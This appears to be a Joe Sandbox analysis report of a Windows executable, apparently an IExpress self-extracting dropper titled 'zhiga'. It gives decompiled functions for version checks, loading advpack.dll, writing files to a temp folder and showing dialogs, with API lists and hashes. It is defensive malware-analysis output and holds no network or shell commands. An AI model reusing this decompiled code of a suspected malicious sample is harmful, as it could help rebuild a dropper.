                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xf89a40 = _t119;
                                                                        						 *0xf88184 = 1;
                                                                        						 *0xf88180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xf89a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xf88184 = _t135;
                                                                        							 *0xf88180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00F844B9(0, _t138);
                                                                        					L66:
                                                                        					return E00F86CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}






































                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F83723
                                                                        • MessageBeep.USER32(00000000), ref: 00F839C3
                                                                        • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 00F839F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$zhiga
                                                                        • API String ID: 2519184315-2183486482
                                                                        • Opcode ID: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                        • Instruction ID: a84a42f266a296e942f95631901a245c3bf68cd370f64b860fa3b22ee86448d4
                                                                        • Opcode Fuzzy Hash: bc4ea0b4fdbae60a60ef70d81da975e87d2377fba5bf0ec79ae39892cb604d23
                                                                        • Instruction Fuzzy Hash: 8991E472F052249BDB38AA14CC817FA77A1EB45B14F1500A9D88997261DB788F81FB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00F86495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00F81781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00F8658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00F86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}


                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F864F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00F86502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                        • API String ID: 438848745-3290281839
                                                                        • Opcode ID: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                        • Instruction ID: 422cb36fd2efdf1091799ef5b672aea7aa096302c1fd9b6d11b27a741f173b45
                                                                        • Opcode Fuzzy Hash: 25f828de1793c4fe06fdd23dd05d91fd67ad02a61b0d95d9e8ad72aad51b85ed
                                                                        • Instruction Fuzzy Hash: 5E01D130A04108ABEB10FB64DC49AFE7778EB50310F50029AF585D61C0DFB4AE8AAB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                        				void* _v8;
                                                                        				char* _v12;
                                                                        				intOrPtr _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				int _v32;
                                                                        				void* _v36;
                                                                        				int _v40;
                                                                        				void* _v44;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				intOrPtr _v56;
                                                                        				intOrPtr _v60;
                                                                        				intOrPtr _v64;
                                                                        				long _t68;
                                                                        				void* _t70;
                                                                        				void* _t73;
                                                                        				void* _t79;
                                                                        				void* _t83;
                                                                        				void* _t87;
                                                                        				void* _t88;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				intOrPtr _t99;
                                                                        				int _t101;
                                                                        				void* _t103;
                                                                        				void* _t106;
                                                                        				void* _t109;
                                                                        				void* _t110;
                                                                        
                                                                        				_v12 = __edx;
                                                                        				_t99 = __ecx;
                                                                        				_t106 = 0;
                                                                        				_v16 = __ecx;
                                                                        				_t87 = 0;
                                                                        				_t103 = 0;
                                                                        				_v20 = 0;
                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                        					L19:
                                                                        					_t106 = 1;
                                                                        				} else {
                                                                        					_t62 = 0;
                                                                        					_v8 = 0;
                                                                        					while(1) {
                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                        						if(E00F82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                        						_v28 = _t68;
                                                                        						if(_t68 == 0) {
                                                                        							_t99 = _v16;
                                                                        							_t70 = _v8 + _t99;
                                                                        							_t93 = _v24;
                                                                        							_t87 = _v20;
                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                        								goto L18;
                                                                        							}
                                                                        						} else {
                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                        							if(_t103 != 0) {
                                                                        								_t73 = GlobalLock(_t103);
                                                                        								_v36 = _t73;
                                                                        								if(_t73 != 0) {
                                                                        									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                        										L15:
                                                                        										GlobalUnlock(_t103);
                                                                        										_t99 = _v16;
                                                                        										L18:
                                                                        										_t87 = _t87 + 1;
                                                                        										_t62 = _v8 + 0x3c;
                                                                        										_v20 = _t87;
                                                                        										_v8 = _v8 + 0x3c;
                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L19;
                                                                        										}
                                                                        									} else {
                                                                        										_t79 = _v44;
                                                                        										_t88 = _t106;
                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        										_t101 = _v28;
                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                        										_t97 = _v48;
                                                                        										_v36 = _t83;
                                                                        										_t109 = _t83;
                                                                        										do {
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                        											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00F82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                        											_t109 = _t109 + 0x18;
                                                                        											_t88 = _t88 + 4;
                                                                        										} while (_t88 < 8);
                                                                        										_t87 = _v20;
                                                                        										_t106 = 0;
                                                                        										if(_v56 < 0 || _v64 > 0) {
                                                                        											if(_v52 < _t106 || _v60 > _t106) {
                                                                        												GlobalUnlock(_t103);
                                                                        											} else {
                                                                        												goto L15;
                                                                        											}
                                                                        										} else {
                                                                        											goto L15;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						goto L20;
                                                                        					}
                                                                        				}
                                                                        				L20:
                                                                        				 *_a8 = _t87;
                                                                        				if(_t103 != 0) {
                                                                        					GlobalFree(_t103);
                                                                        				}
                                                                        				return _t106;
                                                                        			}


                                                                        APIs
                                                                        • GlobalFree.KERNEL32 ref: 00F82A6F
                                                                          • Part of subcall function 00F82773: CharUpperA.USER32(7E92E7A6,00000000,00000000,00000000), ref: 00F827A8
                                                                          • Part of subcall function 00F82773: CharNextA.USER32(0000054D), ref: 00F827B5
                                                                          • Part of subcall function 00F82773: CharNextA.USER32(00000000), ref: 00F827BC
                                                                          • Part of subcall function 00F82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82829
                                                                          • Part of subcall function 00F82773: RegQueryValueExA.ADVAPI32(?,00F81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82852
                                                                          • Part of subcall function 00F82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F82870
                                                                          • Part of subcall function 00F82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00F828A0
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005), ref: 00F82958
                                                                        • GlobalLock.KERNEL32 ref: 00F82969
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F83938,?,?,?,?,-00000005,?), ref: 00F82A21
                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00F82A81
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3949799724-0
                                                                        • Opcode ID: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                        • Instruction ID: 7199bdf0d8b76b11d604cbb09567959cc1db4374a21e72e45db5e0f3d68654ca
                                                                        • Opcode Fuzzy Hash: f2d24d31c5c12a47ea6015d1efa44e206089a8454ff481bc2c70d49a05e9aca9
                                                                        • Instruction Fuzzy Hash: 83511731E00219DBDB65EF98C884AEEFBB5FF48710F14416AE905E3211DB39A941EB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E00F84169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E00F8468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E00F8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E00F844B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}






                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F84189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00F830B4), ref: 00F841E7
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$FINISHMSG
                                                                        • API String ID: 3507850446-3091758298
                                                                        • Opcode ID: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                        • Instruction ID: 7c3926e369d0412d9f3d01b02b4c6005726a317d1cbe4c0f99adba1cf497fadb
                                                                        • Opcode Fuzzy Hash: cd98b4a69be770c8d456550efe61bde9fd973d8ad93b4ca6142e9bfc4de7cfd6
                                                                        • Instruction Fuzzy Hash: 5501F4B270061A7BF72576654C8AFFB718EEBD47A5F104126B705E1180DA6CEC017375
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00F819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                        				signed int _v8;
                                                                        				char _v520;
                                                                        				void* __esi;
                                                                        				signed int _t11;
                                                                        				void* _t14;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				void* _t33;
                                                                        				struct HWND__* _t34;
                                                                        				signed int _t35;
                                                                        
                                                                        				_t33 = __edi;
                                                                        				_t27 = __ebx;
                                                                        				_t11 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t11 ^ _t35;
                                                                        				_t34 = _a4;
                                                                        				_t14 = _a8 - 0x110;
                                                                        				if(_t14 == 0) {
                                                                        					_t32 = GetDesktopWindow();
                                                                        					E00F843D0(_t34, _t15);
                                                                        					_v520 = 0;
                                                                        					LoadStringA( *0xf89a3c, _a16,  &_v520, 0x200);
                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                        					MessageBeep(0xffffffff);
                                                                        					goto L6;
                                                                        				} else {
                                                                        					if(_t14 != 1) {
                                                                        						L4:
                                                                        						_t23 = 0;
                                                                        					} else {
                                                                        						_t32 = _a12;
                                                                        						if(_t32 - 0x83d > 1) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							EndDialog(_t34, _t32);
                                                                        							L6:
                                                                        							_t23 = 1;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00F86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                        			}














                                                                        APIs
                                                                        • EndDialog.USER32(?,?), ref: 00F81A18
                                                                        • GetDesktopWindow.USER32 ref: 00F81A24
                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00F81A4F
                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00F81A62
                                                                        • MessageBeep.USER32(000000FF), ref: 00F81A6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1273765764-0
                                                                        • Opcode ID: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                        • Instruction ID: 728c2fc31c5987c2fc8373e8d54faa30cb4d805b32f67f0ffb9b1a6be94f2d0a
                                                                        • Opcode Fuzzy Hash: 28ecd766ccc60a13b16ff024420d6c87e00a968074fad86b109138b0773a7442
                                                                        • Instruction Fuzzy Hash: DC11CE3150010DABDB04EF64DD48AFE77B8FB09310F108255F92292190DA349E02FB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F87155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xf88004; // 0x7e92e7a6
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xf88004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xf88004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xf88008 = _t37;
                                                                        				return _t37;
                                                                        			}












                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F87182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00F87191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F8719A
                                                                        • GetTickCount.KERNEL32 ref: 00F871A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00F871B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                        • Instruction ID: 119c50f11e19e2f3e0b8d2d475fa5528bcfd264ee14c0bd485c31444b651d7d8
                                                                        • Opcode Fuzzy Hash: acedf29784ceade29a62bef7c18de84e2761f7964f082cdaf570d099ff5a88a7
                                                                        • Instruction Fuzzy Hash: 23112871D0560C9BCF10EBB8DA48AEEBBF4EB08350FA14856D801E7214EA309A05AF41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00F863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				long _v272;
                                                                        				void* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t15;
                                                                        				long _t28;
                                                                        				struct _OVERLAPPED* _t37;
                                                                        				void* _t39;
                                                                        				signed int _t40;
                                                                        
                                                                        				_t15 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t15 ^ _t40;
                                                                        				_v272 = _v272 & 0x00000000;
                                                                        				_push(__ecx);
                                                                        				_v276 = _a16;
                                                                        				_t37 = 1;
                                                                        				E00F81781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        				E00F8658A( &_v268, 0x104, _a12);
                                                                        				_t28 = 0;
                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                        				if(_t39 != 0xffffffff) {
                                                                        					_t28 = _a4;
                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                        						 *0xf89124 = 0x80070052;
                                                                        						_t37 = 0;
                                                                        					}
                                                                        					CloseHandle(_t39);
                                                                        				} else {
                                                                        					 *0xf89124 = 0x80070052;
                                                                        					_t37 = 0;
                                                                        				}
                                                                        				return E00F86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                        			}

                                                                        APIs
                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8642D
                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8645B
                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8647A
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F863EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleWrite
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 1065093856-3217841213
                                                                        • Opcode ID: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
                                                                        • Instruction ID: 14746c62804371590d1fadec75ad96ce43b6c250d46e65103746dc1d49c9ecbb
                                                                        • Opcode Fuzzy Hash: bd3857ede2055ec53e4dee66846e64de45238bfce8f0ed741169ff3e596c9ba7
